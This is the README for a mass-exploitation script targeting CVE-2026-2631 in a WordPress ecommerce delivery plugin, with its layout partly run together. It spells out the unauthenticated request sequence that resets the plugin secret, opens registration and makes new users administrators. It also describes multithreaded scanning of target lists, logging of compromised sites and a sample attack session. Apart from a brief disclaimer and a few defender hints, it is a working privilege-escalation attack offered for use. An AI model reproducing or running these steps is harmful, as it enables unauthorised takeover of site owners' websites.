
Datalogics Ecommerce Delivery – Datalogics < 2.6.60 - Unauthenticated Privilege Escalation
Datalogics Ecommerce Delivery – Datalogics < 2.6.60 - Unauthenticated Privilege Escalation
PoC / Exploit Script:
CVE-2026-2631.py
Author: Khaled Alenazi (Nxploited) – Nxploited ZeroDay Hub
Contact: Telegram:@Kxploit
< 2.6.60 (exclusive)CVE-2026-26319.8 (Critical)AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HThe Datalogics Ecommerce Delivery – Datalogics plugin exposes an unauthenticated endpoint:
/wp-json/gsf/v1/update-options
This script abuses that endpoint to:
shop_secret key using the vulnerable resetStoreConfigrations action.users_can_register = 1.administrator: default_role = administrator.wp-login.php?action=registerIf successful, any new user created through the registration form will be an administrator.
users_can_register = 1default_role = administratorrich (colored and live-updating table).Login_admin.txt.Install required packages:
pip install -r requirements.txt
Example requirements.txt:
requests
rich
urllib3
Or install manually:
pip install requests rich urllib3
For each target:
Normalize URL
http:// is prepended if missing.Reset shop_secret
/wp-json/gsf/v1/update-optionsaction = resetStoreConfigrationsshop_secret = <new_secret>app secret key has been updated successfullyUpdate WordPress Options
action = createUpdateOptionoption_key = users_can_register, option_value = 1option_key = default_role, list.txt (or custom file).N chunks using chunkify.N worker threads, each processing its own list of targets.Queue for status messages to the printer thread.printer_loop) updates a live rich table:
python3 CVE-2026-2631.py
You’ll be interactively prompted for:
Targets file
Targets file (one host/URL per line) [list.txt]:list.txtvictim.comhttps://target-site.comhttp://example.org/blogThreads
Threads (1-50) [10]:1050shop_secret value
shop_secret [Nxploited_newSecret]:Nxploited_newSecretresetStoreConfigrations.These creds will be used for the registration attempt on each vulnerable target.
Create list.txt (or any file you want) with one target per line:
example1.com
http://example2.com
https://shop.example3.net
blog.target-site.org
The script will:
http:// if missing./.All successful operations (even if user registration fails but options are set) are written to:
Login_admin.txt
A typical line:
http://example1.com | register_url: http://example1.com/wp-login.php?action=register | shop_secret: Nxploited_newSecret | reset_ok,option_ok,option_ok,register_open,registered user=Nx_test1 [email protected] pass=Nx_adminSA
Examples of status in the live table:
SUCCESS – options set and/or user registered.FAILED – reset/options failed, vulnerability not exploitable.ERROR – Exception, network errors, timeouts, etc.POST /wp-json/gsf/v1/update-options
shop_secretaction=resetStoreConfigrations
shop_secret=<new_secret>
action=createUpdateOption
shop_secret=<new_secret>
option_key=users_can_register
option_value=1
action=createUpdateOption
shop_secret=<new_secret>
option_key=default_role
option_value=administrator
GET/POST /wp-login.php?action=register
The script:
_wpnonce if present.normalize_site(raw: str) -> str
Normalizes target URLs.
send_reset_secret(site: str, secret: str, timeout: int = 10) -> (bool, str)
Tries the resetStoreConfigrations action.
send_option(site: str, secret: str, key: str, value: str, timeout: int = 10) -> (bool, str)
Sets WordPress options via the vulnerable endpoint.
check_registration_open(site: str, timeout: int = 10) -> (bool, str)
Checks if registration is open and form is accessible.
try_register_user(...) -> (bool, str)
Attempts to register the supplied user.
write_success_line(site: str, secret: str, detail: str)
Logs success details into Login_admin.txt.
worker(...)
Per-thread worker that:
shop_secret$ python3 CVE-2026-2631.py
[Banner / ASCII Art]
Targets file (one host/URL per line) [list.txt]:
> list.txt
Threads (1-50) [10]:
> 20
shop_secret [Nxploited_newSecret]:
> NxSecret2026!
Registration username [Nx_test1]:
> admin_nx
Registration email [[email protected]]:
> [email protected]
Registration password [Nx_adminSA]:
> SuperStrongP@ss!
[Live table starts showing each target’s status]
Processed 5/20 targets · Output: Login_admin.txt
Done. Successful sites (if any) saved to Login_admin.txt.
For Defenders / Site Owners:
wp_users./wp-json/gsf/v1/update-options/wp-login.php?action=registerThis script is provided strictly for educational and authorized security testing purposes only.
If you do not agree with these terms, do not use this script.
CVE-2026-2631@Kxploit on TelegramStay safe, hack responsibly. 🕶️💻
option_value = administratorwordpress option has been created or updated successfullyCheck if Registration is Open
/wp-login.php?action=registerUsers can register, Anyone can register, user_registration, registerformuser registration is currently not allowedAttempt User Registration
_wpnonce from hidden input if present.user_login, user_emailuser_pass/user_pass2 if password fields exist_wpnonce, _wp_http_referer, redirect_to, wp-submit=Registerregistration complete, check your email, user registereduser_already_existsLogging
Login_admin.txt<site> | register_url: <url> | shop_secret: <secret> | <details>
Registration credentials
Registration username [Nx_test1]:Registration email [[email protected]]:Registration password [Nx_adminSA]:printer_loop(queue: Queue, total: int)
Reads messages from the queue and updates a rich live table UI.
main()
Orchestrates: